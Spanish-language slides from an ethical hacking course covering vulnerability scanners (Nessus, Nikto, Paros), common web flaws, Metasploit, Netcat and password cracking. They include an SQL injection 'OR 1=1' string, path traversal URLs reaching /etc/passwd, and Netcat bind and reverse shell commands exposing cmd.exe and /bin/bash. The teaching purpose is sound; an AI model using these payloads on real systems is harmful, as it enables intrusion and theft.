Tiempo: 90 minutos Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá obtener valiosas conclusiones.

14


División de Alta Tecnología Ethical Hacking

6.0

Análisis de las Vulnerabilidades

Contenido de Agenda

  

Introducción Analizadores a Nivel Plataforma Analizadores a Nivel Aplicación

1


División de Alta Tecnología Ethical Hacking

1.1. Análisis de Vulnerabilidades a) El escaneo de puertos da como resultado, qué puertos se tienen para la escucha y además, qué servicios están corriendo (incluye las versiones) b) El AV permite identificar muchos de los principales agujeros de seguridad que ponen en riesgo los sistemas de una red. c) El AV es parte de la etapa de scanning y es el paso anterior antes de iniciar el ataque propiamente dicho.

1.2. Análisis Automatizado Este tipo de análisis se basa en el uso de herramientas que, generalmente con una interfaz simple y amigable, permiten identificar vulnerabilidades en los equipos presentes en una red.

2


División de Alta Tecnología Ethical Hacking

1.3. Análisis Manual Es el proceso por el cual, se ejecutan diversas pruebas sobre un objetivo buscando descubrir, mediante procedimientos manuales, la presencia de vulnerabilidades de seguridad.

1.4. Nivel Plataforma El análisis de vulnerabilidades a nivel de plataforma consiste en la búsqueda, evaluación y comprobación de vulnerabilidades a nivel del sistema operativo que ejecuta el objetivo y los servicios de red que se ofrecen.

3


División de Alta Tecnología Ethical Hacking

1.5. Nivel Aplicación El análisis a nivel aplicación consiste en la búsqueda de vulnerabilidades directamente sobre las aplicaciones que corren en una determinada plataforma.

Contenido de Agenda

  

Introducción Analizadores a Nivel Plataforma Analizadores a Nivel Aplicación

4


División de Alta Tecnología Ethical Hacking

2.1. Software Nessus a) Potente escaner de vulnerabilidades, desarrollado por la empresa Teenable Security de libre descarga. b) Con Nessus se pueden exportar informes, donde se encuentran enlaces a Internet que explican el tipo de vulnerabilidad encontrada. – ¿Cómo es explotada? – ¿Cómo se soluciona?

2.2. Software NeXpose a) NeXpose es una herramienta creada por Rapid7 que se ofrece como una solución en el proceso de identificación de vulnerabilidades y generación de reportes detallados. b) La base de datos de vulnerabilidades evaluadas por NeXpose incluye sistemas operativos, bases de datos y aplicaciones.

5


División de Alta Tecnología Ethical Hacking

Contenido de Agenda

  

Introducción Analizadores a Nivel Plataforma Analizadores a Nivel Aplicación

3.1. Software Nikto a) Se utiliza para encontrar archivos Web por defecto, y examinar la seguridad de un servidor Web, así como, sus aplicaciones CGI. b) El programa busca automáticamente los fallos y muestra un listado categorizándolos de esta manera: – Problemas de configuración. – Archivos y scripts por defecto. – Archivos y scripts inseguros. – Software desactualizado.

6


División de Alta Tecnología Ethical Hacking

3.2. Software Paros a) Paros es una herramienta libre programada en Java utilizada para la evaluación de vulnerabilidades de aplicaciones Web b) Consiste en un proxy que permite capturar las peticiones tanto HTTP como HTTPS para simplemente registrarlas o modificarlas.

3.3. Tamper Data a) Tamper Data es una extensión para el navegador Mozilla Firefox, que puede ser descargada desde https://addons.mozilla.org/en-US/firefox/addon/966/ b) Permite interceptar el tráfico HTTP entre el browser y el sitio web y así, descubrir brechas de seguridad en aplicaciones Web. c) Se pueden inspeccionar y modificar las cabeceras HTTP como las variables enviadas.

7


División de Alta Tecnología Ethical Hacking

Laboratorio nº 6

Ejercicio:  

Tiempo: 60 minutos Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá obtener valiosas conclusiones.

8


División de Alta Tecnología Ethical Hacking

7.0

Inseguridades en Aplicaciones Web

Contenido de Agenda

  

Introducción Vulnerabilidades Web Frameworks de Aprendizaje

1


División de Alta Tecnología Ethical Hacking

1.1. Definición y Conceptos a) Cuando se habla de la seguridad en aplicaciones Web normalmente, no se habla de las vulnerabilidades de los sistemas operativos o servidores Web. b) A menudo, se habla de las vulnerabilidades del propio software y/o aplicaciones desarrolladas por la empresa o por un tercero. c) La seguridad en las aplicaciones Web se encuentran ligadas, exclusivamente, con la lógica, código fuente y contenido de una aplicación.

1.1. Definición y Conceptos d) Las vulnerabilidades que afectan a las aplicaciones Web pueden ser explotadas en distintas plataformas, en contraste de lo que ocurre con otros tipos de vulnerabilidades dependientes de la plataforma donde estos se ejecutan o corren.

2


División de Alta Tecnología Ethical Hacking

Contenido de Agenda

  

Introducción Vulnerabilidades Web Frameworks de Aprendizaje

2.1. Antecedentes a) Para proteger exitosamente una aplicación Web es necesario conocer los tipos de ataques existentes y la vulnerabilidad que éstos explotan para entender sus posibles variaciones. b) SecurityFocus, organización dedicada a la seguridad informática, analizó 30,000 incidentes de seguridad en aplicaciones Web ocurridos durante el 2007. c) Se determinó que los ataques hacia aplicaciones Web más utilizados aprovechan las vulnerabilidades de las seguridad publicadas y/o conocidas.

3


División de Alta Tecnología Ethical Hacking

2.1. Antecedentes d) Hoy no se registran nuevos tipos de vulnerabilidades tan sólo variaciones de las conocidas. Normalmente, los ataques se realizan en la capa de aplicación por los puertos (80 y 443) e) Esto es confirmado por organizaciones internacionales comprometidas con la seguridad Web: - OWASP www.owasp.org - WebAppSec www.webappsec.org

2.1. Antecedentes

http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

4


División de Alta Tecnología Ethical Hacking

2.2. Tipos de Ataque Inyección SQL Este ataque es utilizado por intrusos para comprometer aplicaciones que construyen sentencias SQL utilizando los datos suministrados por el usuario y es posible, debido a falta de validación y saneamiento de los parámetros suministrados por el usuario.

2.2. Tipos de Ataque Inyección SQL SELECT * FROM Tusuario WHERE user='admin' AND passw='123456' SELECT * FROM Tusuario WHERE user='admin' AND passw=' ' OR 1=1’

5


División de Alta Tecnología Ethical Hacking

2.2. Tipos de Ataque Cross Site Scripting (XSS) XSS ocurre cuando portales web de contenido dinámico muestran variables de entrada suplidas por el usuario sin una propia validación. Esta vulnerabilidad permite a un atacante la inyección de código que será ejecutado por el navegador Web de la persona que visualiza la página, (la víctima)

http://www.xssed.org/

2.2. Tipos de Ataque Manipulación del Path La manipulación de path (Path Trasversal) afecta a aplicaciones que toman entrada de los usuarios y la utilizan en un path para acceder al sistema de archivos. Si el atacante ingresa caracteres especiales que modifican el path la aplicación, podrá permitir el acceso no autorizado a recursos del sistema.

6


División de Alta Tecnología Ethical Hacking

2.2. Tipos de Ataque Manipulación del Path www.sitio.com/imprimir.php?file=archivo1.txt www.sitio.com/imprimir.php?file=../../etc/passwd www.sitio.com/imprimir.php?file=../../scripts/db.inc

2.2. Tipos de Ataque Remote File Inclusion Técnica que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación. Los lenguajes de programación de lado servidor, permiten la inclusión de código desde una ubicación externa, tanto local como remota.

7


División de Alta Tecnología Ethical Hacking

Contenido de Agenda

  

Introducción Vulnerabilidades Web Frameworks de Aprendizaje

3.1. WebGoat Aplicación Web, deliberadamente, creada para ser insegura basada en J2EE y desarrollada por OWASP.

Actualmente existen más de 30 lecciones que incluyen vulnerabilidades como XSS, Control de Accesos, SQL Injection, Cookies débiles y Manipulación de Parámetros.

8


División de Alta Tecnología Ethical Hacking

3.2. Damn Vulnerable Wep Application Es una aplicación (PHP/MySQL) de entrenamiento en seguridad Web que se destaca por ser de liviano peso.

Permite entrenamiento en seguridad Web en SQL Injection, XSS (Cross Site Scripting), LFI (Local File Inclusion), RFI (Remote File Inclusion), Command Execution, Upload Script y Login Brute Force.

Laboratorio nº 7

Ejercicio:  

Tiempo: 60 minutos Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá obtener valiosas conclusiones.

9


oidiiddhufhahfofhjfhajos


División de Alta Tecnología Ethical Hacking

8.0

Explotación de las Vulnerabilidades

Contenido de Agenda

   

Trabajando con Exploits Metasploit La Navaja Suiza del Hacker Password Cracking

1


División de Alta Tecnología Ethical Hacking

1.1. Introducción a) Luego de realizar el análisis de las vulnerabilidades se tiene conocimiento exacto de los principales agujeros de seguridad TI de la empresa. b) A continuación, es necesario informarse sobre todas las vulnerabilidades para comprenderlas, saber a qué sistemas afectan, bajo qué condiciones éstas pueden ser explotadas y si existe un exploit público. c) Revisar el código fuente para verificar que no es falso y confirmar las plataformas en que operan. Durante el proceso de Ethical Hacking puede modificarse aunque por temas de tiempos no es común.

1.2. Securityfocus.com

2


División de Alta Tecnología Ethical Hacking

1.3. Exploit-db.com

1.4. Packetstormsecurity.org

3


División de Alta Tecnología Ethical Hacking

1.5. Compilando Exploits

Extensión: .c, .cc gcc exploit.c -o binario ./binario parámetros

extensión: .pl perl exploit.pl parámetros

Extensión: .php php exploit.php parámetros

Extensión: .rb ruby exploit.rb parámetros

Extensión: .py python exploit.py parámetros

Contenido de Agenda

   

Trabajando con Exploits Metasploit La Navaja Suiza del Hacker Password Cracking

4


División de Alta Tecnología Ethical Hacking

2.1. Introducción Es una herramienta integral de software libre para el desarrollo y ejecución de exploits contra equipos remotos. Es conocido y respetado por liberar algunos de los exploits más sofisticados, a tan sólo unas horas de haber sido liberada una vulnerabilidad públicamente.

2.2. Forma de Instalación a) b) c) d) e) f) g) h)

apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby apt-get install subversion libreadline-ruby irb ri rubygems tar xf framework-3.X.tar.gz sudo mkdir -p /opt/metasploit3 sudo cp -a msf3/ /opt/metasploit3/msf3 sudo chown root:root -R /opt/metasploit3/msf3 sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/ svn update /opt/metasploit3/msf3/

5


División de Alta Tecnología Ethical Hacking

2.3. Formas de Utilización Metasploit permite interactuar con su funcionalidad, a través de dos interfaces: mediante la consola llamada msfconsole y de una interfaz Web de nombre msfweb.

2.4. Metasploit Framework Al margen de la interfaz, el procedimiento para explotar una vulnerabilidad son los mismos: a) b) c) d)

Elegir el exploit a utilizar Configurar el exploit Elegir el Payload Ejecutar el exploit

6


División de Alta Tecnología Ethical Hacking

Contenido de Agenda

   

Trabajando con Exploits Metasploit La Navaja Suiza del Hacker Password Cracking

3.1. Introducción Netcat es una herramienta que permite, a través de la línea de comandos, leer y escribir información en sockets a través de la red de datos utilizando el protocolo de comunicación TCP/IP.

7


División de Alta Tecnología Ethical Hacking

3.2. Funcionalidades de la Herramienta a) Conectarse y abrir un puertos TCP/UDP b) Asociar un shell a un puerto (para realizar una administración remota de un terminal) c) Transferencias de archivos d) Abrir puertas traseras (backdoors) e) Crear canales encubiertos

3.3. Parámetros Básicos

8


División de Alta Tecnología Ethical Hacking

3.4. Transfiriendo Archivos Netcat puede ser utilizado para transferir archivos de una computadora a otra, a través de la red. Esto se aplica para archivos de texto y binarios. a) Máquina A: nc -lvp 4444 > salida.txt b) Máquina B: nc -vv 192.168.1.1 444 < test.txt

3.5. Shell Directo (Puerta Trasera) Máquina A: a) Windows: nc -lvvp 4444 -e cmd.exe b) Linux: nc -lvvp 444 -e /bin/bash Máquina B: a) nc -v 192.168.1.1 4444

9


División de Alta Tecnología Ethical Hacking

3.6. Shell Reversa (Firewall Bypass) Máquina B: a) nc -lvvp 4444 Máquina A: a) Windows: nc -v 192.168.1.1 4444 -e cmd.exe b) Linux: nc -v 192.168.1.1 4444 e /bin/bash

Contenido de Agenda

   

Trabajando con Exploits Metasploit La Navaja Suiza del Hacker Password Cracking

10


División de Alta Tecnología Ethical Hacking

4.1. Introducción Password Cracking es el proceso informático por el cual, se intenta conseguir credenciales válidas de una aplicación y puede ser utilizado para recuperar credenciales perdidas, evaluar la robustez de las credenciales o conseguir acceso no autorizado.

4.2. Técnicas de Password Cracking

Password Guessing

Ataque Híbrido

Password Sniffing

Ataque por Diccionario

Fuerza Bruta

11


División de Alta Tecnología Ethical Hacking

4.3. Herramientas

THC Hydra

Medusa

Cain & Abel

Laboratorio nº 8

Ejercicio:  

Tiempo: 60 minutos Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá obtener valiosas conclusiones.

12


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.